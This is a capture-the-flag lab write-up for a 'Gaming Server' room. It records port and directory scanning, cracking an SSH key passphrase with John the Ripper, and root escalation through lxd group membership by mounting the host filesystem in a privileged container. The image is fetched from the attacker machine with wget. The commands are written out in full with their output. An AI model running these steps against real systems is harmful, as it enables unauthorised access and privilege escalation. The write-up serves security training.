Gaming Server
Date: 11 November, 2021
Author: Dhaval Kotak
Room: Gaming Server
Port Scanning
nanomite @ zeus in ~/thm/gaming_server
⚡️ nmap 10.10.19.112 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 22:21 IST
Nmap scan report for 10.10.19.112
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 9.16 secondsGobuster Scanning
nanomite @ zeus in ~/thm/gaming_server
⚡️ gobuster dir -u http://10.10.19.112 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.19.112
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/11 22:22:38 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 2762]
/robots.txt (Status: 200) [Size: 33]
/secret (Status: 301) [Size: 313] [--> http://10.10.19.112/secret/]
/server-status (Status: 403) [Size: 277]
/uploads (Status: 301) [Size: 314] [--> http://10.10.19.112/uploads/]
===============================================================
2021/11/11 22:24:36 Finished
===============================================================Getting SSH Credentials
Username
We find the username john in the page source
RSA Key
There is a RSA key in the secret directory we discovered by gobuster.
We can use ssh2John and then JohnTheRipper itself to get the passphrase for getting the ssh login.
nanomite @ zeus in ~/thm/gaming_server
⚡️ python /opt/john/ssh2John.py id_rsa > hash
nanomite @ zeus in ~/thm/gaming_server
⚡️ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein (id_rsa)
1g 0:00:00:06 71.47% (ETA: 22:29:46) 0.1658g/s 1697Kp/s 1697Kc/s 1697KC/s alfaris
Session abortedSSH Login
Now we can log in as john using ssh credentials we found.
And we get the user.txt right away
nanomite @ zeus in ~/thm/gaming_server
⚡️ ssh john@10.10.19.112 -i id_rsa
The authenticity of host '10.10.19.112 (10.10.19.112)' can't be established.
ECDSA key fingerprint is SHA256:LO5bYqjXqLnB39jxUzFMiOaZ1YnyFGGXUmf1edL6R9o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.19.112' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Nov 11 17:05:39 UTC 2021
System load: 0.0 Processes: 97
Usage of /: 41.1% of 9.78GB Users logged in: 0
Memory usage: 32% IP address for eth0: 10.10.19.112
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
Last login: Mon Jul 27 20:17:26 2020 from 10.8.5.10
john@exploitable:~$ ls
user.txt
john@exploitable:~$ cat user.txt
a5c2ff8b9c(REDACTED)ff2f1a5a6e7eWhat is the user flag?
a5c2ff8b9c(REDACTED)ff2f1a5a6e7e
Privilege Escalation
Our uid is a member of lxd group which is a linux container.
john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip
),46(plugdev),108(lxd)We can download alphine builder on our local machine, which provides a way to create Alpine Linux images, so we can mount it using LXD.
First clone the repository in your machine and then run the alpine builder script as root in order to build the image as a tar file
nanomite @ zeus in ~/thm/gaming_server
⚡️ git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 42, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 42 (delta 5), reused 4 (delta 1), pack-reused 27
Receiving objects: 100% (42/42), 3.11 MiB | 650.00 KiB/s, done.
Resolving deltas: 100% (11/11), done.
nanomite @ zeus in ~/thm/gaming_server
⚡️ cd lxd-alpine-builder
nanomite @ zeus in ~/thm/gaming_server/lxd-alpine-builder on master
⚡️ sudo ./build-alpine Now start a server to transfer the files from your attacker machine to the target machine
// Your Machine
nanomite @ zeus in ~/thm/gaming_server/lxd-alpine-builder on master*
⚡️ python3 -m http.server 5000
Serving HTTP on 0.0.0.0 port 5000 (http://0.0.0.0:5000/) ...// Target Machine
john@exploitable:~$ wget 10.17.14.25:5000/alpine-v3.13-x86_64-20210218_0139.tar.gz/Now import the image
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimageThen spawn the root shell by running the following commands:
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/shAfter that we can find the root flag and read it.
What is the root flag?
2e337b8c9f(REDACTED)8d4e6a7c88fc
Last updated